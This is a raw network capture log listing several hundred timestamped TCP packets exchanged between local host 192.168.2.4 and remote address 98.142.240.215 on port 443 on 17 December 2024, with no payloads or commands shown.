                                                                                                                                                                              Dec 17, 2024 18:12:37.058208942 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.058213949 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.058260918 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.061063051 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.061129093 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.061134100 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.061204910 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.063148975 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.063214064 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.063219070 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.063252926 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.066879988 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.066946983 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.066951990 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.067028999 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.069761992 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.069829941 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.069842100 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.069911957 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.072223902 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.072293043 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.072304964 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.072360039 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.075181961 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.075258017 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.075268984 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.075333118 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.078030109 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.078104973 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.078116894 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.078177929 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.081010103 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.081110954 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.081123114 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.081268072 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.083851099 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.083925009 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.083936930 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.084036112 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.086829901 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.086908102 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.086920023 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.087127924 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.090609074 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.090677023 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.090688944 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.090804100 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.093066931 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.093139887 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.093152046 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.093230009 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.095947027 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.096026897 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.096039057 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.096096039 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.099821091 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.099916935 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.099929094 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.100032091 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.102747917 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.102827072 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.102838039 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.102901936 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.105678082 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.105762005 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.105773926 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.105983019 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.108625889 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.108736038 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.108747959 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.108879089 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.111526966 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.111591101 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.111603022 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.111665964 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.114885092 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.114950895 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.114962101 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.115010977 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.117810965 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.117870092 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.117881060 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.117945910 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.120666981 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.120750904 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.120762110 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.120841026 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.123603106 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.123670101 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.123682022 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.123881102 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.126488924 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.126559019 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.126586914 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.126724958 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.129425049 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.129507065 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.129518032 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.129628897 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.132369041 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.132452965 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.132466078 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.132531881 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.135240078 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.135310888 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.135348082 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.135409117 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.138643026 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.138722897 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.138741016 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.138914108 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.141545057 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.141623020 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.141678095 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.141736031 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.144464016 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.144530058 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.144550085 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.144608021 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.153754950 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.153841019 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.153852940 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.153923988 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.156616926 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.156677008 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.156682968 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.156867027 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.159545898 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.159621000 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.159626961 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.159746885 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.162523031 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.162590027 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.162595034 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.162657022 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.165339947 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.165406942 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.165412903 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.165651083 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.167886019 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.167957067 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.167962074 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.168082952 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.170298100 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.170353889 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.170358896 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.170412064 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.172509909 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.172583103 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.172588110 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.172676086 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.174854994 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.174922943 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.174927950 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.174974918 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.177192926 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.177256107 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.177261114 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.177361012 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.179662943 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.179740906 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.179754019 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.179821014 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.182569027 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.182638884 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.182651043 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.182745934 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.184192896 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.184286118 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.184297085 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.184428930 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.186475039 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.186542988 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.186554909 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.186609983 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.189517021 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.189918041 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.189930916 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.190082073 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.191955090 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.192025900 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.192038059 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.192090034 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.346101046 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.346204042 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.346259117 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.346371889 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.347986937 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.348076105 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.348097086 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.348161936 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.350332975 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.350419998 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.350433111 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.350565910 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.352610111 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.352670908 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.352679014 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.352719069 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.355006933 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.355065107 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.355072021 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.355118036 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.357320070 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.357372999 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.357413054 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.357419014 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.357494116 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.359630108 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.359685898 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.359693050 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.359740019 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.362740993 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.362793922 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.362802029 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.362848043 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.364310026 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.364371061 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.364382029 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.364453077 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.366638899 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.366718054 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.366724968 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.366769075 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.369702101 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.369760990 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.369767904 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.369817019 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.371372938 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.371429920 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.371438026 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.371507883 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.376703978 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.376770973 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.376791000 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.376852989 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.379777908 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.379854918 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.379863977 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.379913092 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.394321918 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.394396067 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.394418001 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.394476891 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.396656036 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.396722078 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.396728992 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.396800995 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.557321072 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.557399988 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.557436943 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.557562113 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.560246944 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.560313940 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.560322046 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.560642004 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.561698914 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.561758995 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.561769962 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.561913967 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.563986063 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.564054012 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.564060926 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.564239979 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.567037106 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.567133904 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.567146063 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.567454100 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.568624973 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.568696022 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.568708897 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.568885088 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.570857048 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.570924997 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.570934057 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.571069956 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.574043989 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.574107885 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.574117899 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.574266911 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.577078104 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.577182055 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.577192068 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.577617884 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.579329014 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.579396009 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.579405069 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.579505920 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.582546949 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.582606077 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.582616091 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.583162069 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.584439039 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.584505081 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.584513903 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:37.584564924 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:37.587239981 CET4434973198.142.240.215192.168.2.4
